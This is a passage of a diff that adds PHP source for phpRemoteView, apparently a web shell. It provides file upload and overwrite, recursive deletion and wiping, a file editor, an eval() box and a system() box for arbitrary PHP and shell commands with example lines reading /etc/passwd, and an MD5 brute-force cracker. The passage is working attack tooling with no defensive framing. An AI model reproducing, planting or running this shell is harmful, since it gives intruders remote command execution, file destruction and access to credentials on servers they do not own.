+<input type=submit value='".mm("CREATE/OVERRIDE")."'>
+<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br>
+<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
+</form>";
+
+echo "
+<form enctype='multipart/form-data' action='$self' method=post>
+<input type=hidden name=c value=fileupload_submit>
+<b>FILE UPLOAD: ".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name='MAX_FILE_SIZE' value=999000000>
+1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
+2. ".mm("save this file on path").": 
+  <input name=df size=50 value=\"$d$f\"><br>
+3. <input type=checkbox name=df2 value=1 id=df2 checked>
+  <label for=df2>".mm("create file name automatic")."</label>
+  &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp;
+  ".mm("type any file name").":
+  <input name=df3 size=20><br>
+4. <input type=checkbox name=df4 value=1 id=df4>
+  <label for=df4>".mm("convert file name to lovercase")."</label><br>
+<input type=submit value='".mm("Send File")."'>
+</form>";
+
+break;
+
+
+case "base64":
+
+   echo "<pre>\n";
+   $ff=fopen($d.$f,"rb") or exit("<p>access denied");
+   $text=fread($ff,max(filesize($d.$f),$maxsize_fread));
+   fclose($ff);
+   switch ($c2) {
+      case 0:
+         echo base64_encode($text);
+         break;
+      case 1:
+         echo chunk_split(base64_encode($text));
+         break;
+      case 2:
+         $text=base64_encode($text);
+         echo substr(preg_replace("!.{1,76}!","'\\0'.\n",$text),0,-2);
+         break;
+      case 3:
+         echo base64_decode($text);
+         break;
+   }
+   break;
+
+
+
+case "d": // information for DIRECTORY
+
+   echo $GLOBALS['html'];
+   up($d,"","Directory");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   echo "<p>";
+
+   //up_link($d,"");
+
+   if (!realpath($d) || !is_dir($d.$f)) exit(mm("dir not found"));
+
+   echo "<table border=0 cellspacing=0 cellpadding=0><tr><td>";
+
+   echo "<table border=0 cellspacing=1 cellpadding=1 class=tab>";
+   echo "<tr class=tr><td>&nbsp;&nbsp;&nbsp;".mm("Owner")."/".mm("Group")."&nbsp;&nbsp;&nbsp;</td><td>";      
+   $tmp=@_posix_getpwuid(fileowner($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+   else echo $tmp['name']." ";
+   $tmp=@_posix_getgrgid(filegroup($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+   else echo $tmp['name'];
+   echo "</td></tr><tr class=tr><td>";
+   echo mm("Perms")."</td><td>".display_perms(fileperms($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("Create time")."</td><td>".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("Access time")."</td><td>".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("MODIFY time")."</td><td>".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
+
+   echo "</tD><form action=$self method=get><td width=70>&nbsp;</td><td>
+   <input type=hidden name=c value=\"tree\">
+   Root <input type=text name=d value=\"$d\"><br>
+   <input type=checkbox name=showfile value=1 id=tree1><label for=tree1>Show files in tree</label><br>
+   <input type=checkbox name=showsize value=1 id=tree2 checked><label for=tree2>Show dir/files size</label><br>
+   <input type=submit value='Show TREE directory'>";
+
+   echo "</td></form></tr></table><P>";
+
+
+   
+   if (!$write_access) exitw();
+
+   echo "<b>".mm("FILE SYSTEM COMMANDS")."</b><p>";
+
+   echo "
+<table border=0 cellspacing=0 cellpadding=0><tr>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=dirdelete>
+<input type=hidden name=c2 value=files>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=ref value=\"$url\">
+<input type=submit value='".mm("Delete all files in dir")." (rm *)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=dirdelete>
+<input type=hidden name=c2 value=dir>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=ref value=\"$url\">
+<input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+</tr></table>
+";
+
+echo "
+<form action=$self method=post>
+<b>".mm("MAKE DIR")."</b> (type full path)
+<input type=hidden name=c value=newdir_submit>
+<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("MkDir")."'>
+</form>";
+
+
+echo "
+<form action=$self method=post>
+<b>".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name=c value=newfile_submit>
+".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("CREATE/OVERRIDE")."'>
+<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br>
+<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
+</form>";
+
+echo "
+<form enctype='multipart/form-data' action='$self' method=post>
+<input type=hidden name=c value=fileupload_submit>
+<b>(FILE UPLOAD) ".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name='MAX_FILE_SIZE' value=999000000>
+1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
+2. ".mm("save this file on path").": 
+  <input name=df size=50 value=\"".realpath($d)."/\"><br>
+3. <input type=checkbox name=df2 value=1 id=df2 checked>
+  <label for=df2>".mm("create file name automatic")."</label>
+  &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp;
+  ".mm("type any file name").":
+  <input name=df3 size=20><br>
+4. <input type=checkbox name=df4 value=1 id=df4>
+  <label for=df4>".mm("convert file name to lovercase")."</label><br>
+<input type=submit value='".mm("Send File")."'>
+</form>";
+
+
+break;
+
+
+
+case "tree":
+
+$tcolors=array(
+'eee','ddd','ccc','bbb','aaa','999','888','988','a88','b88','c88','d88','e88','d98',
+'ca8','bb8','ac8','9d8','8e8','8d9','8ca','8bb','8ac','89d','88e');
+
+function dir_tree($df,$level=0) {
+   global $tcolors,$self;
+
+   $df=str_replace("//","/",$df);
+   $dirs=array();
+   $files=array();
+   if ($dir=opendir($df)) {
+      while (($file=readdir($dir))!==false) {
+         if ($file=="." || $file=="..") continue;
+         if (is_dir("$df/$file"))  {
+            $dirs[]=$file;
+         }
+         else {
+            $files[]=$file;
+         }
+      }
+   }
+   closedir($dir);
+
+   sort($dirs);
+   sort($files);
+   
+   $i=min($level,count($tcolors)-1);
+   $c=$tcolors[$i][0].$tcolors[$i][0].$tcolors[$i][1].$tcolors[$i][1].$tcolors[$i][2].$tcolors[$i][2];
+
+   echo "\r\n\r\n\r\n
+   <table width=100% border=0 cellspacing=2 cellpadding=1><tr><td bgcolor=#000000>
+   <table width=100% border=0 cellspacing=0 cellpadding=1 bgcolor=#$c>
+   <tr><td colspan=3 class=dir>".
+   "<a href=$self?c=l&d=".urlencode($df)." class=dir><img src=$self?name=dir&c=img&1 border=0>".
+   $df."</a></td></tr>";
+
+   if (count($dirs) || count($files)) {
+      echo "<tr><td width=15>&nbsp;</td><td class=all width=97%>";
+      for ($i=0; $i<count($files); $i++) {
+         echo $files[$i]." ";
+      }
+      for ($i=0; $i<count($dirs); $i++) {
+         dir_tree($df."/".$dirs[$i],$level+1);
+      }
+      echo "</td><td width=10>&nbsp;</td></tr>";
+   }
+   echo '</table></td></tr></table>';
+}
+
+   echo "
+   <STYLE>
+   .all {
+   font-family: Verdana;
+   font-size: 80%;
+   }
+   .dir {
+   font-family: Verdana;
+   font-size: 95%;
+   background: #666699;
+   font-weight: bold;
+   color: white
+   }
+   </STYLE>";
+   echo $GLOBALS['html'];
+
+   up($d,"","Directory");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   echo "<p>";
+   dir_tree($d);
+   break;
+
+
+
+case "delete":
+
+   if (!$write_access) exitw();
+
+   if (!isset($c2)) exit("err# delete 1");
+   if (!isset($confirm) || strlen($confirm)<3) exit("".mm("Confirm not found (go back and set checkbox)")."");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a><p>";
+   if (!isset($d) || !isset($f) || !@file_exists($d.$f) || !@realpath($d.$f)) 
+      exit("".mm("Delete cancel - File not found")."");
+   if (realpath(getenv("SCRIPT_FILENAME"))==$d.$f && !isset($delete_remview_confirm))
+      exit(mm("Do you want delete this script (phpRemoteView) ???")."<br><br><br><br>
+      <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".urlencode($f)."&delete_remview_confirm=YES'>[".mm("YES").", ".mm("DELETE")." <b>".mm("ME")."</b>]</a>
+       &nbsp; &nbsp; &nbsp;
+      <a href='javascript:history.back(-1)'>[".mm("NO (back)")."]</a>");
+
+   switch ($c2) {
+   case "delete":
+       //exit("$d $f");
+       ob();
+       if (!unlink($d.$f)) 
+          obb().exit("<font color=red><b>".mm("Delete cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb"); 
+       Header("Location: $self?c=l&d=".urlencode($d));
+       echo "<P><a href=$self?c=l&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Delete ok")."";
+       break;
+   case "touch":
+       ob();
+       if (!touch($d.$f)) 
+          obb().exit("<font color=red><b>".mm("Touch cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb"); 
+       Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+       echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Touch ok (set current time to 'modify time')")."";
+       break;
+   case "clean":
+       ob();
+       $fi=fopen($d.$f,"w+") or 
+          obb().exit("<font color=red><b>".mm("Clean (empty file) cancel")." - ".mm("ACCESS DENIED")."</b></font>obb"); 
+       ftruncate($fi,0);
+       fclose($fi);
+       Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+       echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Clean ok (file now empty)")."";
+       break;
+   case "wipe":
+       $size=filesize($d.$f);
+       ob();
+       $fi=fopen($d.$f,"w+") or 
+          obb().exit("<font color=red><b>".mm("Wipe cancel - access denied")."</b></font>$obb");
+       $str=md5("phpspbru".mt_rand(0,999999999).time());
+       for ($i=0; $i<5; $i++) $str.=$str; // strlen 1024 byte
+       for ($i=0; $i<intval($size/1024)+1; $i++) fwrite($fi,$str);
+       fclose($fi);
+       ob();
+       if (!unlink($d.$f)) 
+          obb().exit("err# delete 2 - file was rewrite, but not delete...(only write access, delete disable)$obb"); 
+       Header("Location: $self?c=l&d=".urlencode($d));
+       echo "<a href=$self?c=i&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Wipe ok (file deleted)")."";
+       break;
+   }
+
+   //Header("Location: $self?c=l&d=".urlencode(dirname($df)));
+   //echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
+
+   break;
+
+
+case "dirdelete":
+
+   if (!$write_access) exitw();
+
+function dir_delete($df) {
+   echo "<b>".basename($df)."</b><ul>";
+   if ($dir=opendir($df)) {
+      $i=0;
+      while (($file=readdir($dir))!==false) {
+         if ($file=="." || $file=="..") continue;
+         if (is_dir("$df/$file"))  {
+            dir_delete($df."/".$file);
+         } 
+         else {
+            echo "$file<br>";
+            echo "".mm("DELETE")." <tt>$df/$file</tt> ...<br>";
+            unlink($df."/".$file);
+         }
+         $i++;
+      }
+      //if ($i==0) echo "-empty-<br>";
+   }
+   closedir($dir);
+   echo "</ul>";
+   echo "".mm("DELETE")." ".mm("DIR")." <tt>$df</tt> ...<br>";
+   rmdir("$df/$file");
+}
+
+   if (!isset($c2)) exit("error dirdelete 1");
+   if (!isset($confirm)) exit("".mm("Confirm not found (go back and set checkbox)")."!");
+   $df="$d";
+
+   switch ($c2) {
+
+      case "files":
+         echo "<h3>".mm("Deleting all files in")." <tt>$df</tt> ...</h3>";
+         if ($dir=opendir($df)) {
+            while (($file=readdir($dir))!==false) {
+                if ($file=="." || $file=="..") continue;
+                if (is_dir($df.$file))  {
+                   echo "<big><tt><b>>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
+                }
+                elseif (is_file($df.$file)) {
+                   echo "<big><tt><b><font color=red>$file</font></b></tt></big> ".mm("deleting")."...";
+                   unlink($df.$file);
+                   echo "<br>";
+                }
+                else {
+                   echo "<big><tt><b>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
+                }
+            }  
+         }
+         closedir($dir);
+         $ref="$self?c=l&d=".urlencode($d);
+         break;
+   
+      case "dir":
+         echo "<h3>".mm("Deleting all dir/files (recursive) in")." <tt>$df</tt> ...</h3>";
+         dir_delete($df);
+         $ref="$self?c=l&d=".urlencode(realpath($d."/.."));
+         break;
+   }
+   //header("Location: $ref");
+   echo "<p><a href=$ref>".mm("DONE, go back")."</a>";
+   break;
+
+case "copy": 
+
+   if (!$write_access) exitw();
+
+   if (!isset($from) || !@file_exists($from) || !@realpath($from))
+      exit("err# copy 1, file [$from] not found");
+   if (!isset($to) || strlen($to)==0)
+      exit("err# copy 2, file [$to] not found");
+   echo "Copy: ....<hr size=1 noshade>";
+   if (!copy($from,$to)) { 
+      echo "<hr size=1 noshade><font color=red><b>Error!</b></font><p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."<p>";
+   }
+   else
+      echo "".mm("DONE")."!<p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."</a> (dir 'from')<p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($to)).">".dirname($to)."</a> (dir 'to')<p>";
+   break;
+
+
+
+
+case "e": // edit
+
+   if (!$write_access) exitw();
+
+   if (!@realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
+   echo $GLOBALS['html'];
+   up($d,$f);
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   up_link($d,$f);
+   $msg="";
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS (don't edit!)")."</b></font>)";
+   else fclose($fi);
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied (don't edit!)")."</b></font>)";
+   else fclose($fi);
+   if ($msg=="") $msg="(<font color=#009900><b>".mm("full read/write access")."</b></font>)";
+   echo "<p><b>".mm("EDIT FILE")."</b> $msg<p>";
+
+   if (!$fi=@fopen($d.$f,"rb")) exit("".mm("can't open, access denied")."");
+   echo "<form action=$self method=post>
+   <input type=hidden name=c value=e_submit>
+   <input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+   <input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+   <textarea name=text cols=70 rows=20 style='width: 100%;'>".
+   htmlspecialchars(fread($fi,filesize($d.$f)))."</textarea><p>
+   <input type=submit value=' ".mm("SAVE FILE (write to disk)")." '>
+   <input type=checkbox name=confirm value=1 id=conf> 
+   <label for=conf><font color=red><b><= confirm</b></font></label>
+   </form>";
+
+   break;
+
+
+case "e_submit":
+
+   if (!$write_access) exitw();
+
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit("file not found");
+   if (!isset($text)) exit("err# e_submit 1");
+   if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
+   if (!$fi=@fopen($d.$f,"w+")) exit("access denied");
+   fwrite($fi,$text);
+   fclose($fi);
+   Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+   echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">SAVE DONE (go back)!</a>";
+
+   break;
+
+
+
+case "newfile_submit":
+
+   if (!$write_access) exitw();
+
+   if (!isset($text) || !isset($df)) exit("err# newfile_submit 1");
+   if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
+   if (!$fi=@fopen($df,"w+")) exit("access denied, can't create/open [$df]");
+   fwrite($fi,$text);
+   fclose($fi);
+   Header("Location: $self?c=l&d=".urlencode(dirname($df)));
+   echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
+   break;
+
+
+case "fileupload_submit":
+
+   if (!$write_access) exitw();
+   if (!isset($df)) exit("err# newfile_submit 1");
+   if (!isset($df3)) exit("err# newfile_submit 2");
+
+   $fname="";
+   if (isset($df2)) { 
+      if (!preg_match("~([^/]+)$~",$HTTP_POST_FILES['userfile']['name'],$ok)) {
+         exit("Upload failed: can't detect file name");
+      }
+      $fname=$ok[1];
+   }
+   else {
+      $fname=$df3;
+   }
+   if ($fname=="") 
+     exit("".mm("You mast checked 'create file name automatic' OR typed file name!").""); 
+   if (isset($df4)) $fname=strtolower($fname);
+
+   echo "Temp file: ".$HTTP_POST_FILES['userfile']['tmp_name']."<br>";
+   echo "Origin file name: ".$HTTP_POST_FILES['userfile']['name']."<br>";
+   echo "File size: ".$HTTP_POST_FILES['userfile']['size']."<br>";
+   if ($df[strlen($df)-1]!="/") $df.="/";
+   echo "".mm("SAVING TO").": <font color=blue>$df</font><font color=red><b>$fname</b></font><p>";
+
+   ob();
+   $ok=copy($HTTP_POST_FILES['userfile']['tmp_name'],"$df$fname");
+   obb();
+   if (!$ok) exit("<font color=red><b>".mm("Sorry, access denied")."</b></font> $obb");
+
+   if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
+   Header("Location: $ref");
+   echo "<a href='$ref'>NEW FILE SAVED</a>";
+  
+   break;
+
+
+case "newdir_submit": 
+
+   if (!$write_access) exitw();
+   if (!isset($df)) exit("err# newdir_submit 1");
+   ob();
+   if (!mkdir($df,$mkdir_mode)) {
+      obb();
+      exit("Access denied $obb");
+   }
+   obb();
+   if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
+   Header("Location: $ref");
+   echo "<a href='$ref'>Go to new directory!</a>";
+
+   break;
+
+
+case "t": 
+
+   echo "<h3>
+   <a href='$self'>START PAGE</a> |
+   <a href='$self?c=t'>Eval/Shell</a> | 
+   <a href='$self?c=codes'>Character map</a>
+   </h3>";
+
+
+   if (!$write_access) exitw();
+   error_reporting(2038);
+
+   if (!isset($php)) {
+      $php="/* line 1 */\n\n// ".mm("for example, uncomment next line").":\nphpinfo();\n\n//readfile(\"/etc/passwd\");\n\n/* line 8 */";
+      $skipphp=1;
+      $pre='checked';
+      $nlbr='';
+      $xmp='';
+      $htmls='checked';
+   } 
+
+   echo "<b>".mm("Eval PHP code")."</b> (".mm("don't type")." \"&lt;?\" ".mm("and")." \"?&gt;\")
+<form action=$self method=post>
+<input type=hidden name=c value=t>
+<textarea name=php rows=".(!isset($skipphp)?10:4)." cols=60 style='width:100%;'>$php</textarea>
+<input type=checkbox name=pre value='checked' $pre id='pre'>
+   <label for='pre'> add &lt;pre&gt;</label> &nbsp;
+<input type=checkbox name=xmp value='checked' $xmp id='xmp'>
+   <label for='xmp'> add &lt;xmp&gt;</label> &nbsp;
+<input type=checkbox name=htmls value='checked' $htmls id='htmls'>
+   <label for='htmls'> add htmlspecialchars()</label> &nbsp;
+<input type=checkbox name=nlbr value='checked' $nlbr id='nlbr'>
+   <label for='nlbr'> add nl2br()</label><br>
+<input type=submit></form>
+<P>";
+
+   if (!isset($shell)) $skipshell=1;
+
+   if (!isset($skipphp)) {
+      echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
+      if ($pre<>'') echo "<pre>";
+      if ($xmp<>'') echo "<xmp>";
+      if ($nlbr<>'' || $htmls<>'') {
+         ob_start();
+      }
+      if ($phpeval_access) eval($php);
+      else die("Sorry, function eval() disabled.");
+      if ($nlbr<>'' || $htmls<>'') {
+         $tmp=ob_get_contents();
+         ob_end_clean(); 
+         if ($htmls<>'') $tmp=htmlspecialchars($tmp);
+         if ($nlbr<>'') $tmp=nl2br($tmp);
+         echo $tmp;
+      }
+      if ($xmp<>'') echo "</xmp>";
+      if ($pre<>'') echo "</pre>";
+      echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
+      echo "</table></table></table></table></table></table></table></table></table></center></table><hr size=1 noshade>";
+   }
+
+   if (!isset($shell)) {
+      $shell="#".mm("example (remove comments '#')").": \n\n#cat /etc/passwd;\n\n#ps -ax\n\n#uname -a";
+      $skipshell=1;
+   }
+   echo "<P><b>".mm("Shell commands")."</b>
+<form action=$self method=post>
+<input type=hidden name=c value=t>
+<textarea name=shell rows=".(!isset($skipshell)?10:4)." cols=60 style='width:100%;'>$shell</textarea><br>
+<input type=submit></form>
+<P>";
+   if (!isset($skipshell)) {
+      echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>";
+      if ($system_access) system($shell);
+      else die("Sorry, function system() disabled.");
+      echo "</xmp>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
+      </table></table></table></table></table></table></table></table></table></center><hr size=1 noshade>";
+   }
+
+
+  $ttype=array(1=>"MD5",7=>"Decode MD5 (password crack)<br>",
+  2=>"Base64",3=>"Base64 + chunk",4=>"Base64 + chunk + quotes",
+  5=>"Decode Base64<br>",
+  6=>"UnixTime=>Date(".time().")",
+  8=>"MKtime: YYYY MM DD [hh [mm [ss]]]<br>",
+  9=>"Translit=&gt;RusText", 14=>"RusText=&gt;Translit<br>",
+  10=>"cp1251=&gt;koi8r",11=>"koi8r=&gt;cp1251",12=>"cp1251=&gt;mac",13=>"mac=&gt;cp1251",
+  15=>"koi8r=&gt;mac",16=>"mac=&gt;koi8r",
+  );
+  echo "<P><b>".mm("Universal convert")."</b>";
+
+  echo "<a name=convert></a><form action='$self#convert' method=post>";
+  foreach ($ttype as $k=>$v) 
+     echo "&nbsp;&nbsp;<nobr><input ".($k==$name?"checked":"")." type=radio name=name value=$k id=x$k><label for=x$k>$v</label></nobr> ";
+
+  echo "
+<input type=hidden name=c value=t>
+<textarea name=convert rows=".(isset($convert)?10:3)." cols=60 style='width:100%;'>".htmlspecialchars($convert)."</textarea><br>
+<input type=submit><br>";
+
+   
+   $russtr1="JCUKENGZH_FYVAPROLDESMIT_Bjcukengzh_fyvaproldesmit_b";
+   $russtr2="ÉÖÓÊÅÍÃÇÕÚÔÛÂÀÏĞÎËÄİÑÌÈÒÜÁéöóêåíãçõúôûâàïğîëäıñìèòüá";
+   function from_translit($ss) {
+      global $russtr1,$russtr2;
+      $w=array("Sch",'Ù',"SCH",'Ù',"ScH",'Ù',"SCh",'Ù',"sch",'ù',"Jo",'¨',"JO",'¨',"jo",'¸',
+      "Zh",'Æ',"ZH",'Æ',"zh",'æ',"Ch",'×',"CH",'×',"ch",'÷',"Sh",'Ø',"SH",'Ø',"sh",'ø',
+      "##",'Ú',"''",'Ü',"Eh",'İ',"EH",'İ',"eh",'ı',"Ju",'Ş',"JU",'Ş',"ju",'ş',"Yu",'Ş',
+      "YU",'Ş',"yu",'ş',"YA","ß","Ya","ß","ya","ÿ","Ja",'ß',"JA",'ß',"ja",'ÿ');
+      $c=count($w);
+      for ($i=0; $i<$c; $i+=2) $ss=str_replace($w[$i],$w[$i+1],$ss);
+      $ss=strtr($ss,$russtr1,$russtr2);
+      $ss=preg_replace("!([à-ÿ]+)~([à-ÿ]+)!is","\\1\\2",$ss);
+      return $ss;
+   }
+   function to_translit($ss) {
+      global $russtr1,$russtr2;
+      $ss=strtr($ss,$russtr2,$russtr1);
+      $ss=str_replace(
+         array('Ø', 'Ù',  'Æ', 'ß', '×', 'Ş', '¨', 'ø', 'ù',  'æ', 'ÿ', '÷', 'ş', '¸', ),
+         array('SH','SCH','ZH','YA','CH','YU','YO','sh','sch','zh','ya','ch','yu','yo',),
+         $ss);
+      return $ss;
+   }
+   
+   if (isset($convert)) {
+      if (!isset($name)) $name="0";
+      $out="";
+      switch ($name) {
+
+         case 1: 
+            $out=md5($convert);
+            break;
+
+         case 2:
+            $out=base64_encode($convert);
+            break;
+
+         case 3:
+            $out=chunk_split(base64_encode($convert));
+            break;
+
+         case 4:
+            $out=base64_encode($convert);
+            $out=substr(preg_replace("!.{1,76}!","'\\0'.\n",$out),0,-2);
+            break;
+
+         case 5:
+            $out=base64_decode($convert);
+            break;
+
+         case 6:
+            $convert=intval($convert);
+            if ($convert==0) $convert=time();
+            $out="Unixtime=$convert\n---Day/Month/Year--\n".
+               date("d/m/Y H:i:s",$convert)."\n".
+               date("d-m-Y H:i:s",$convert)."\n".
+               date("d.m.Y H:i:s",$convert)."\n".
+             "---Month/Day/Year--\n".
+               date("m/d/Y H:i:s",$convert)."\n".
+               date("m-d-Y H:i:s",$convert)."\n".
+               date("m.d.Y H:i:s",$convert)."\n".
+             "---------SQL-------\n".
+               date("Y-m-d H:i:s",$convert)."\n".
+               date("Y m d H i s",$convert)."\n".
+               date("YmdHis",$convert);
+            break;
+
+         case 8:
+            $c=explode(" ",trim(preg_replace("! +!"," ",$convert)));
+            if (count($c)<3 || count($c)>6) $out="Bad value. Type: 2000 12 31 or 2000 12 31 12 59 59";
+            else {
+               if (empty($c[0])) $c[0]=1970;
+               if ($c[0]<50) $c[0]=2000+$c[0];
+               if ($c[0]>50 && $c[0]<100) $c[0]=1900+$c[0];
+               if (empty($c[1])) $c[1]=1;
+               if (empty($c[2])) $c[2]=1;
+               if (empty($c[3])) $c[3]=0;
+               if (empty($c[4])) $c[4]=0;
+               if (empty($c[5])) $c[5]=0;
+               $out="TIME: $c[0]-$c[1]-$c[2] $c[3]:$c[4]:$c[5]\nMKTIME: ".mktime($c[3],$c[4],$c[5],$c[1],$c[2],$c[0]);
+            }
+            break;
+
+         case 9:
+            $out=from_translit($convert);
+            break;
+
+         case 14:
+            $out=to_translit($convert);
+            break;
+
+         case 10: $out=convert_cyr_string($convert,'w','k'); break;
+         case 11: $out=convert_cyr_string($convert,'k','w'); break;
+         case 12: $out=convert_cyr_string($convert,'w','m'); break;
+         case 13: $out=convert_cyr_string($convert,'m','w'); break;
+         case 15: $out=convert_cyr_string($convert,'k','m'); break;
+         case 16: $out=convert_cyr_string($convert,'m','k'); break;
+
+         case 7:
+            echo "<script>top.location.href='$self?c=md5crack&text=$convert'</script>";
+            break;
+
+         case 0:
+            $out="Please select anythink function in list. Example: type 'test' and select 'md5'. Then click 'Submit'.";
+            break;
+
+         default: 
+            $out='Sorry, this function not work (try new versions)';
+      }
+      echo "<P><hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<pre><xmp>$out</xmp></pre>\n\n\n\n\n\n\n\n\n<hr size=1 noshade>";
+   }
+   
+   break;
+
+
+case "md5crack":
+
+   echo "<form action=$self name=main><input type=hidden name=c value=md5crack>
+   <h2>Decode MD5 (<a href=$self>home</a>|<a href=$self?c=t&name=1#convert>md5</a>)</h2><P>";
+
+   if (!isset($go)) {
+      if (!isset($fullqty)) $fullqty="";
+      if (!isset($fulltime)) $fulltime="";
+      if (!isset($php)) $php="";
+      if (!isset($from)) $from="";
+      echo "<b>STRING</b>: <input type=text name=text value='$text' size=40> (only 32 char: 0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f)";
+      echo "<P><b>Range</b>: <input type=text name=php value=\"".htmlspecialchars($php)."\" size=90><br>";
+      $chars=array(
+      'a-z'=>"abcdefghijklmnopqrstuvwxyz",
+      'a-z,A-Z'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",
+      'a-z,0-9'=>"abcdefghijklmnopqrstuvwxyz0123456789",
+      'a-z,A-Z,0-9'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
+      'a-z,A-Z,0-9,other'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~`!@#\$%^&*()_+-=[]{};:,<.>/\"'\\");
+      $i=0;
+      foreach ($chars as $k=>$v) {
+         echo "<script>str$i=\"".str_replace("\"","\\\"",str_replace("\\","\\\\",$v))."\"</script>
+         <a href='' onclick=\"document.main.php.value=str$i;return false\">$k</a> &nbsp; ";
+         $i++;
+      }
+      echo "<P>
+      <b>Start from</b>: <input type=text size=70 name=from value='$from'><P>
+      <input type=hidden name=go value=1>
+      <input type=hidden name=fullqty value=$fullqty>
+      <input type=hidden name=fulltime value=$fulltime>
+      <input type=submit value='Start!'><form>";
+   }
+   else {
+
+      function mdgetword() {
+         global $php,$from,$word;
+         $word="";
+         for ($i=0; $i<count($from); $i++) $word.=$php[$from[$i]];
+      }
+
+      $fulltime=@intval($fulltime);
+      $fullqty=@intval($fullqty);
+
+      $text=strtolower($text);
+      if (!preg_match("!^[0-9a-f]{32}$!",$text)) exit("md5 bad format: must be 32 bytes, range 0-9,a,b,c,d,e,f");
+      if (!isset($php) || strlen($php)==0) $php="qwertyuiopasdfghjklzxcvbnm";
+      if (!isset($from) || !preg_match("!^([0-9]+):(([0-9]+,)*[0-9]+)$!",$from,$ok)) {
+         $pos=0;
+         $from=0;
+      }
